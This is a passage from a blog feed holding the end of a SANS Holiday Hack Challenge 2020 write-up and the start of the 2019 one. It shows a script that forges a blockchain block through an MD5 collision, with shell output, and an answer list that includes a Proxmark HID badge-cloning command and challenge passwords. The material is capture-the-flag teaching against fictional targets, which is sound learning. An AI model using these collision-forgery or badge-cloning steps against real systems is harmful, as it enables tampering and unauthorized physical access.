    &lt;span class="n"&gt;jf_orig_block&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;jf_orig_data&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; \
            &lt;span class="nb"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;jf_block&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; \
            &lt;span class="nb"&gt;bytearray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;jf_block&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We save it to a file&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./jf_orig_block&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;wb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;jf_orig_block&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's run it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./reconstruct_jack_block.py
&lt;span class="go"&gt;Match found: offset 137, new_byte value 0xd7&lt;/span&gt;
&lt;span class="go"&gt;Match found: offset 329, new_byte value 0x1b&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; md5sum ./blocks/block_1010
&lt;span class="go"&gt;b10b4a6bd373b61f32f4fd3a0cdfbf84  ./blocks/block_1010&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; md5sum ./jf_orig_block
&lt;span class="go"&gt;b10b4a6bd373b61f32f4fd3a0cdfbf84  ./jf_orig_block&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; sha256sum ./jf_orig_block
&lt;span class="hll"&gt;&lt;span class="go"&gt;fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb  ./jf_orig_block&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have successfully reconstructed Jack's original block. We can see that the
MD5 hashes of our original block and the altered block that is in the block
chain match. The SHA256 sum of Jack's block is &lt;code&gt;fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can even rebuild the original blockchain, and check that the signatures are
still valid:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cp -r blocks/ blocks_orig/ &lt;span class="c1"&gt;# we copy our original extracted blocks&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cp jf_orig_block ./blocks_orig/block_1010 &lt;span class="c1"&gt;# we replace Jack&amp;#39;s block with our recovered original block&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat ./blocks_orig/* &amp;gt; blockchain_orig.dat
&lt;span class="gp"&gt;$&lt;/span&gt; sha256sum blockchain.dat blockchain_orig.dat
&lt;span class="go"&gt;a29c3b456566a321e69bdcebed58eccd452e377941d6d44e40ae8c37e9629e5f  blockchain.dat&lt;/span&gt;
&lt;span class="go"&gt;37679c58c8c2aa0c0939df5187064543181e5118490b0be21e7bbcf25ade693b  blockchain_orig.dat&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We recreated the original blockchain, and we can see that the SHA256 sums
don't match. Let's verify the original chain:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;Crypto.PublicKey&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;RSA&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;official_public.pem&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;fh&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;    &lt;span class="n"&gt;official_public_key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;RSA&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;importKey&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fh&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;span class="gp"&gt;...&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;c_orig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Chain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;blockchain_orig.dat&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;c_orig&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verify_chain&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;official_public_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;previous_hash&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;c_orig&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;previous_hash&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our original chain is indeed correct, thanks to the MD5 collision.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id47"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We can now go through the door in Santa's office. We arrive on the roof, where
Jack Frost has been apprehended.&lt;/p&gt;
&lt;img alt="sans_christmas_challenge_2020_w00t.png" class="align-center" src="/images/sans-christmas-challenge-2020/sans_christmas_challenge_2020_w00t.png" /&gt;
&lt;img alt="prison_jack_frost.png" class="align-center" src="/images/sans-christmas-challenge-2020/prison_jack_frost.png" /&gt;
&lt;p&gt;&lt;em&gt;Jack Frost says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;My plan was NEARLY perfect… but I never expected someone with your skills
to come around and ruin my plan for ruining the holidays!&lt;/p&gt;
&lt;p&gt;And now, they’re gonna put me in jail for my deeds.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2020/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Thank you for foiling Jack’s foul plot!&lt;/p&gt;
&lt;p&gt;He sent that magical portrait so he could become me and destroy the
holidays!&lt;/p&gt;
&lt;p&gt;Due to your incredible work, you have set everything right and saved the
holiday season!&lt;/p&gt;
&lt;p&gt;Congratulations on a job well done!&lt;/p&gt;
&lt;p&gt;Ho Ho Ho!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thank &lt;em&gt;you&lt;/em&gt; Santa, you're making me blush.&lt;/p&gt;
&lt;p&gt;Some personal questions still remain:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Was the ImageMagick trail in the tag generator really a dead-end? I still
wonder why opening files didn't work in the real environment whereas it
worked on my machine.&lt;/li&gt;
&lt;li&gt;How come I had to specify both a &lt;code&gt;preinst&lt;/code&gt; &lt;em&gt;and&lt;/em&gt; a &lt;code&gt;postinst&lt;/code&gt;
in my malicious &lt;code&gt;.deb&lt;/code&gt; file for my payload to be executed?&lt;/li&gt;
&lt;li&gt;What about the TLS server on the hijacked machine in the ARP shenanigans
challenge?&lt;/li&gt;
&lt;li&gt;There's also some binary blob at the end of the trailer of
&lt;code&gt;129459.pdf&lt;/code&gt;. I couldn't determine if it was part of the MD5 collision
attack or not. We didn't need to modify it at all, so I'm wondering why it
was there in the first place.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If anyone has any answers, I'd be glad to know them!&lt;/p&gt;
&lt;p&gt;Thanks to the SANS team for yet again a superb Christmas challenge. I
particularly enjoyed the ARP challenge, and of course this last crypto
challenge was a delight! Can't wait for next year!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="answer-to-the-questions"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id48"&gt;Answer to the questions&lt;/a&gt;&lt;/h2&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;There is a photo of Santa's Desk on that billboard with his personal gift
list. What gift is Santa planning on getting Josh Wright for the holidays?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Santa is planning on getting a &lt;code&gt;Proxmark&lt;/code&gt; for Josh Wright.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;When you unwrap the over-wrapped file, what text string is inside the
package?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The text string says &lt;code&gt;North Pole: The Frostiest Place on Earth&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;Help Sugarplum Mary in the Courtyard find the supervisor password for the
point-of-sale terminal. What's the password?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The password is &lt;code&gt;santapass&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;Talk to Pepper Minstix in the entryway to get some hints about the
Santavator.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We managed to operate the Santavator in... unauthorized ways.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;Open the HID lock in the Workshop.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We can open the HID lock with the command &lt;code&gt;lf hid sim -r 2006e22f13&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;Access the Splunk terminal in the Great Room. What is the name of the
adversary group that Santa feared would attack KringleCon?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The adversary group Santa feared is &lt;code&gt;The Lollipop Guild&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;Jack Frost is somehow inserting malicious messages onto the sleigh's CAN-D
bus. We need you to exclude the malicious messages and no others to fix the
sleigh.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We were able to defrost the sleigh using filters:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;ID: &lt;code&gt;19B&lt;/code&gt;. Operator: &lt;code&gt;Equals&lt;/code&gt;. Criterion: &lt;code&gt;0000000F2057&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;ID: &lt;code&gt;080&lt;/code&gt;. Operator: &lt;code&gt;Less&lt;/code&gt;. Criterion: &lt;code&gt;000000000000&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is
in the environment variable &lt;code&gt;GREETZ&lt;/code&gt;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The variable &lt;code&gt;GREETZ&lt;/code&gt; is equal to &lt;code&gt;JackFrostWasHere&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;Go to the NetWars room on the roof and help Alabaster Snowball get access
back to a host using ARP. Retrieve the document at &lt;code&gt;/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt&lt;/code&gt;.
Who recused herself from the vote described on the document?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The person who recused hersel was &lt;code&gt;Tanta Kringle&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;Bypass the Santavator fingerprint sensor. Enter Santa's office without
Santa's fingerprint.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Several ways to bypass the fingerprint sensor were detailed in &lt;a class="reference external" href="#second-method-pretending-we-have-the-bits-and-bobs"&gt;this section&lt;/a&gt;
and &lt;a class="reference external" href="#third-method-who-needs-bits-and-bobs-anyway"&gt;this section&lt;/a&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="11"&gt;
&lt;li&gt;a. Even though the chunk of the blockchain that you have ends with block
129996, can you predict the nonce for block 130000?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The nonce for block 130000 has a value of &lt;code&gt;57066318f32f729d&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="11"&gt;
&lt;li&gt;b. The SHA256 of Jack's altered block is: &lt;code&gt;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&lt;/code&gt;.
If you're clever, you can recreate the original version of that block by
changing the values of only 4 bytes. Once you've recreated the original
block, what is the SHA256 of that block?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Jack's original block has a SHA256 sum of &lt;code&gt;fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>SANS Christmas Challenge 2019</title><link href="https://allyourbase.utouch.fr/posts/2020/01/14/sans-christmas-challenge-2019/" rel="alternate"></link><published>2020-01-14T00:00:00+01:00</published><updated>2020-01-14T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2020-01-14:/posts/2020/01/14/sans-christmas-challenge-2019/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2019_logo.png" class="align-center" src="/images/sans-christmas-challenge-2019/sans_christmas_challenge_2019_logo.png" /&gt;
&lt;p&gt;On the twelfth day of Christmas, my true love gave to me:&lt;/p&gt;
&lt;p&gt;Twelve Phishers phishing&lt;/p&gt;
&lt;p&gt;Eleven Shells a-popping&lt;/p&gt;
&lt;p&gt;Ten Passwords spraying&lt;/p&gt;
&lt;p&gt;Nine Splunks a-splunking&lt;/p&gt;
&lt;p&gt;Eight Machines learning&lt;/p&gt;
&lt;p&gt;Seven Metasploit scanning&lt;/p&gt;
&lt;p&gt;Six Blue Teamers crying&lt;/p&gt;
&lt;p&gt;Five Golden Tickets&lt;/p&gt;
&lt;p&gt;Four Domain Hashes&lt;/p&gt;
&lt;p&gt;Three Malicious Macros&lt;/p&gt;
&lt;p&gt;Two LAN Turtles&lt;/p&gt;
&lt;p&gt;and a Pwnage in …&lt;/p&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2019_logo.png" class="align-center" src="/images/sans-christmas-challenge-2019/sans_christmas_challenge_2019_logo.png" /&gt;
&lt;p&gt;On the twelfth day of Christmas, my true love gave to me:&lt;/p&gt;
&lt;p&gt;Twelve Phishers phishing&lt;/p&gt;
&lt;p&gt;Eleven Shells a-popping&lt;/p&gt;
&lt;p&gt;Ten Passwords spraying&lt;/p&gt;
&lt;p&gt;Nine Splunks a-splunking&lt;/p&gt;
&lt;p&gt;Eight Machines learning&lt;/p&gt;
&lt;p&gt;Seven Metasploit scanning&lt;/p&gt;
&lt;p&gt;Six Blue Teamers crying&lt;/p&gt;
&lt;p&gt;Five Golden Tickets&lt;/p&gt;
&lt;p&gt;Four Domain Hashes&lt;/p&gt;
&lt;p&gt;Three Malicious Macros&lt;/p&gt;
&lt;p&gt;Two LAN Turtles&lt;/p&gt;
&lt;p&gt;and a Pwnage in a Pear Tree&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2019/"&gt;2019 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id1"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-0-talk-to-santa-in-the-quad" id="id2"&gt;Objective 0: Talk to Santa in the Quad&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-1-find-the-turtle-doves" id="id3"&gt;Objective 1: Find the Turtle Doves&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-2-unredact-threatening-document" id="id4"&gt;Objective 2: Unredact Threatening Document&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-3" id="id5"&gt;Objective 3:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bushy-evergreen-s-cranberry-pi-challenge" id="id6"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#windows-log-analysis-evaluate-attack-outcome" id="id7"&gt;Windows Log Analysis: Evaluate Attack Outcome&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-4" id="id8"&gt;Objective 4:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sugarplum-mary-s-cranberry-pi-challenge" id="id9"&gt;SugarPlum Mary's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#windows-log-analysis-determine-attacker-technique" id="id10"&gt;Windows Log Analysis: Determine Attacker Technique&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-5" id="id11"&gt;Objective 5:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sparkle-redberry-s-canberry-pi-challenge" id="id12"&gt;Sparkle Redberry's Canberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#network-log-analysis-determine-compromised-system" id="id13"&gt;Network Log Analysis: Determine Compromised System&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-6-splunk" id="id14"&gt;Objective 6: Splunk&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answering-the-challenge-question" id="id15"&gt;Answering the challenge question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answering-the-training-questions" id="id16"&gt;Answering the training questions&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#first-question" id="id17"&gt;First question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#second-question" id="id18"&gt;Second question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#third-question" id="id19"&gt;Third question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fourth-question" id="id20"&gt;Fourth question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fifth-question" id="id21"&gt;Fifth question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sixth-question" id="id22"&gt;Sixth question&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#seventh-question" id="id23"&gt;Seventh question&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-7" id="id24"&gt;Objective 7:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-dorm-room-s-keypad" id="id25"&gt;The Dorm Room's Keypad&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#minty-candy-cane-s-cranberry-pi-challenge" id="id26"&gt;Minty Candy Cane's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#get-access-to-the-steam-tunnels" id="id27"&gt;Get Access To The Steam Tunnels&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-8" id="id28"&gt;Objective 8:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#alabaster-snowball-s-cranberry-pi-challenge" id="id29"&gt;Alabaster Snowball's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bypassing-the-frido-sleigh-capteha" id="id30"&gt;Bypassing the Frido Sleigh CAPTEHA&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-9" id="id31"&gt;Objective 9:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#pepper-minstix-s-cranberry-pi-challenge" id="id32"&gt;Pepper Minstix's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#retrieve-scraps-of-paper-from-server" id="id33"&gt;Retrieve Scraps of Paper from Server&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-10" id="id34"&gt;Objective 10:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#holly-evergreen-s-cranberry-pi-challenge" id="id35"&gt;Holly Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#recover-cleartext-document" id="id36"&gt;Recover Cleartext Document&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-11" id="id37"&gt;Objective 11:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#kent-tinseltooth-s-cranberry-pi-challenge" id="id38"&gt;Kent Tinseltooth's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#open-the-sleigh-shop-door" id="id39"&gt;Open the Sleigh Shop Door&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-12" id="id40"&gt;Objective 12:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#wunorse-openslae-s-cranberry-pi-challenge" id="id41"&gt;Wunorse Openslae's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#filter-out-poisoned-sources-of-weather-data" id="id42"&gt;Filter Out Poisoned Sources of Weather Data&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id43"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answer-to-the-questions" id="id44"&gt;Answer to the questions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id1"&gt;Introduction&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;This write-up received a &lt;a class="reference external" href="https://holidayhackchallenge.com/2019/winners_answers.html"&gt;super honorable mention&lt;/a&gt;
from the SANS team. I was also a runner up for the Best Overall Answer. Thank
you so much for this, I'm incredibly humbled!&lt;/p&gt;
&lt;p&gt;Santa is organizing a new KringleCon, with new speakers and all that! It's
taking place at Elf University.&lt;/p&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2019/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to the North Pole and KringleCon 2!&lt;/p&gt;
&lt;p&gt;Last year, KringleCon hosted over 17,500 attendees and my castle got a
little crowded.&lt;/p&gt;
&lt;p&gt;We moved the event to Elf University (Elf U for short), the North Pole’s
largest venue.&lt;/p&gt;
&lt;p&gt;Please feel free to explore, watch talks, and enjoy the con!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here are the questions we must answer:&lt;/p&gt;
&lt;ol class="arabic"&gt;
&lt;li&gt;&lt;p class="first"&gt;Someone sent a threatening letter to Elf University. What is the first word
in ALL CAPS in the subject line of the letter? Please find the letter in the
Quad.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;We're seeing attacks against the Elf U domain! Using the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/Security.evtx.zip"&gt;event log data&lt;/a&gt;,
identify the user account that the attacker compromised using a password
spray attack.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Using &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/sysmon-data.json.zip"&gt;these normalized Sysmon logs&lt;/a&gt;,
identify the tool the attacker used to retrieve domain password hashes from
the lsass.exe process.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;The attacks don't stop! Can you help identify the IP address of the
malware-infected system using these &lt;a class="reference external" href="https://downloads.elfu.org/elfu-zeeklogs.zip"&gt;Zeek logs&lt;/a&gt;?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Access &lt;a class="reference external" href="https://splunk.elfu.org/"&gt;https://splunk.elfu.org/&lt;/a&gt; as &lt;code&gt;elf&lt;/code&gt; with password
&lt;code&gt;elfsocks&lt;/code&gt;. What was the message for Kent that the adversary embedded
in this attack? The SOC folks at that link will help you along!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Gain access to the steam tunnels. Who took the turtle doves? Please tell us
their first and last name.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Help Krampus beat the &lt;a class="reference external" href="https://fridosleigh.com/"&gt;Frido Sleigh contest&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;Gain access to the data on the &lt;a class="reference external" href="https://studentportal.elfu.org/"&gt;Student Portal&lt;/a&gt;
server and retrieve the paper scraps hosted there. What is the name of
Santa's cutting-edge sleigh guidance system?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p class="first"&gt;The Elfscrow Crypto tool is a vital asset used at Elf University for
encrypting SUPER SECRET documents. We can't send you the source, but we do
